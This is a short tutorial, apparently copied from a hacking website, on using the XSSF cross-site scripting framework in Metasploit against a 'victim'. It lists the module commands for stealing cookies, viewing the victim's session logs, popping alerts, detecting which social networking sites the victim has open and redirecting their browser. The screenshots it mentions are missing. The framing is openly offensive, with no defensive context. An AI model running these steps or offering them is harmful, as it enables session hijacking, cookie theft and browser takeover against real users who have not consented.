Hack Remote PC, IPhone, Android using XSSF in Metasploit

First install XSSF in metasploit,  please refer the following link “http://www.hackingarticles.in/xssf-cross-site-scripting-framework-in-metasploit/ ”
Now use the following command In metasploit to capture victim’s cookies
“use auxiliary/xssf/public/misc/cookie”

Once you get msf auxiliary prompt run the following command
“xssf_logs 1”

Now run the command “xssf_log 2” to store the logs where 2 is the Session ID

Now run “xssf_urls” command to get all xssf URL commands

Now run “http://localhost:8889/gui.html?guipage=main” to see the logs of victim’s PC.

You can see the logs in the last section as shown in the following image.

If you wish to warn the victim run “use auxiliary/xssf/public/misc/alert” command

The following is the Alert message on Victim’s Screen

You can see the logs in the last section as shown in the following image.
Now refresh your log browser and see the series of logs as shown in the following image.

Now run “use auxiliary/xssf/public/misc/check_connected” to check if victim has opened any Social networking sites (eg . gmail, facebook , twitter)

Refresh the log browser and see the logs getting updated as shown in below image.

Finally run “use auxiliary/xssf/public/misc/redirect to redirect the victim’s page”

Refresh the log browser and see the logs getting updated as shown in below image.


Fuente:http://www.hackingarticles.in/hack-remote-pc-iphone-android-using-xssf-in-metasploit/